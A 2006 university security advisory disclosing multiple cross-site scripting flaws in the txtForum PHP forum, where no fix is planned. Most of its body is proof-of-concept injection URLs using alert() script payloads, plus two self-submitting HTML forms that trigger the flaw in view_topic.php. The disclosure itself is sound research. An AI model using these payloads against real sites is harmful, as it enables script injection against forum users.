Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

txtForum: Script Injection Vulnerability

[SA19165] Nodez "op" File Inclusion and Cross-Site Scripting

MyBloggie: Multiple XSS Vulnerabilities

DCP Portal: Multiple XSS Vulnerabilities

From:	enji_(at)_seclab.tuwien.ac.at <enji_(at)_seclab.tuwien.ac.at>
Date:	09.03.2006
Subject:	txtForum: Multiple XSS Vulnerabilities

===========================================================
txtForum: Multiple XSS Vulnerabilities
===========================================================
Technical University of Vienna Security Advisory
TUVSA-0603-003, March 9, 2006
===========================================================


Affected applications
----------------------

txtForum (http://sourceforge.net/projects/txtforum1)

Versions 1.0.4-dev and prior.


Description
------------

There are multiple cross-site scripting (XSS) vulnerabilities which can be verified by using the following
exploits (the user needs to be logged in). They are roughly sorted by entry points (i.e., the names of the
files that have to be navigated). The vulnerabilities were discovered under the assumption that
register_globals is on, and that magic_quotes_gpc is off.


index.php
-----------

- skins/txtforum/under_topic.tpl, line 11
 (included by index.php on line 99)
 $prev: not initialized if the file "data/headers.txt" does not exist;
 exploit in this case: analogous to line 123 (see below)

- 122:
 $next: not initialized if the file "data/headers.txt" does not exist;
 exploit in this case: analogous to line 123 (see below)

- 123:
 $rand5: is never initialized
 http://localhost/txtforum104/index.
php?rand5="><script>alert('xss_string')</script>



new_topic.php
---------------

- skins/txtforum/topic_form.tpl, line 17
 http://localhost/txtforum104/new_topic.
php?r_username='><script>alert('xss_string')</scr
ipt>

- skins/txtforum/topic_form.tpl, line 18
 http://localhost/txtforum104/new_topic.
php?r_loc='><script>alert('xss_string')</script>



profile.php
------------

- skins/txtforum/viewprofile.tpl, line 11

http://localhost/txtforum104/profile.
php?mode=viewprofile&nick=admin&r_num=<script>alert('xss_st
ring')</script>

- skins/txtforum/editprofile.tpl, line 18

http://localhost/txtforum104/profile.
php?mode=editprofile&r_family_name="><script>alert('xss
_string')</script>

- skins/txtforum/editprofile.tpl, line 22
 http://localhost/txtforum104/profile.
php?mode=editprofile&r_icq="><script>alert('xss_string'
)</script>

- skins/txtforum/editprofile.tpl, line 27
 http://localhost/txtforum104/profile.
php?mode=editprofile&r_yahoo="><script>alert('xss_strin
g')</script>

- skins/txtforum/editprofile.tpl, line 31
 http://localhost/txtforum104/profile.
php?mode=editprofile&r_aim="><script>alert('xss_string'
)</script>

- skins/txtforum/editprofile.tpl, line 35

http://localhost/txtforum104/profile.
php?mode=editprofile&r_homepage="><script>alert('xss_st
ring')</script>

- skins/txtforum/editprofile.tpl, line 39

http://localhost/txtforum104/profile.
php?mode=editprofile&r_interests="><script>alert('xss_s
tring')</script>

- skins/txtforum/editprofile.tpl, line 43

http://localhost/txtforum104/profile.
php?mode=editprofile&r_about="</textarea><script>alert('
xss_string')</script>

- skins/txtforum/editprofile.tpl, line 65
 $selected1: works if the user has set $r_hide_email == 0;
 else: use vulnerability below (selected0)
 http://localhost/txtforum104/profile.
php?mode=editprofile&selected1="><script>alert('xss_str
ing')</script>

- skins/txtforum/editprofile.tpl, line 65
 $selected0: works if the user has set $r_hide_email == 1
 http://localhost/txtforum104/profile.
php?mode=editprofile&selected0="><script>alert('xss_str
ing')</script>

- skins/txtforum/editprofile.tpl, line 69
 $signature_selected1: works if the user has set $show_sig == 0;
 else: use vulnerability below ($signature_selected0)

http://localhost/txtforum104/profile.
php?mode=editprofile&signature_selected1="><script>alert('
xss_string')</script>

- skins/txtforum/editprofile.tpl, line 69
 $signature_selected0: if $show_sig == 1

http://localhost/txtforum104/profile.
php?mode=editprofile&signature_selected0="><script>alert('
xss_string')</script>

- skins/txtforum/editprofile.tpl, line 73
 $smile_selected1: if $show_smile == 0

http://localhost/txtforum104/profile.
php?mode=editprofile&smile_selected1="><script>alert('x
ss_string')</script>

- skins/txtforum/editprofile.tpl, line 73
 $smile_selected0: if $show_smile == 1

http://localhost/txtforum104/profile.
php?mode=editprofile&smile_selected0="><script>alert('x
ss_string')</script>

- skins/txtforum/editprofile.tpl, line 78

http://localhost/txtforum104/profile.
php?mode=editprofile&ubb_selected1="><script>alert('xss
_string')</script>

- skins/txtforum/editprofile.tpl, line 78

http://localhost/txtforum104/profile.
php?mode=editprofile&ubb_selected0="><script>alert('xss
_string')</script>


reply.php
-----------

- skins/txtforum/reply_form.tpl, line 31
 http://localhost/txtforum104/reply.
php?quote=</textarea><script>alert('xss_string')</
script>

- skins/txtforum/reply_form.tpl, line 43
 http://localhost/txtforum104/reply.
php?tid="><script>alert('xss_string')</script>



view_topic.php
----------------

- skins/txtforum/next_preview.tpl, line 6
 http://localhost/txtforum104/view_topic.
php?page=27&tid='><script>alert('xss_string')<
/script>

- view_topic.php, line 12
 $tid is echoed at several places:
 http://localhost/txtforum104/view_topic.
php?print_adminJS=1&tid="><script>alert('xss_string'
)</script>

- common.php, line 15
 parameter of admin_msg is echoed;
 - called from sticky.php, 39:

 <form action='http://localhost/txtforum104/view_topic.
php?sticked=<script>alert("xss_string")</script>'

method="post">
   <input type="text" name="where" value="sticky"/>
   <input type="submit">
 </form>
 <script type="text/javascript">
   document.forms[0].submit();
 </script>

 - called from delete.php, 63:

 <form action='http://localhost/txtforum104/view_topic.php' method="post">
   <input type="text" name="where" value="deleteme"/>
   <input type="text" name="mid" value="<script>alert('xss_string')</script>"
/>
   <input type="submit">
 </form>
 <script type="text/javascript">
   document.forms[0].submit();
 </script>

- view_topic.php, line 244
 $next, via $tid:
 http://localhost/txtforum104/view_topic.php?page=-1&tid=xss_string

- view_topic.php, line 271
 http://localhost/txtforum104/view_topic.php?tid=xss_string

- view_topic.php, line 272:
 $tid: as before

- view_topic.php, line 280
 $tid: as before


Solution
---------

There is no solution to these issues yet.

Timeline:

February 23, 2006:
Vulnerabilities indicated via confy at users dot sourceforge dot net.
Provided detailed report of the vulnerabilities after the author's response.
No fixes are planned.

March 9, 2006:
Advisory submission.


References
-----------

http://www.seclab.tuwien.ac.at/advisories/TUVSA-0603-003.txt


Nenad Jovanovic
Secure Systems Lab
Technical University of Vienna
www.seclab.tuwien.ac.at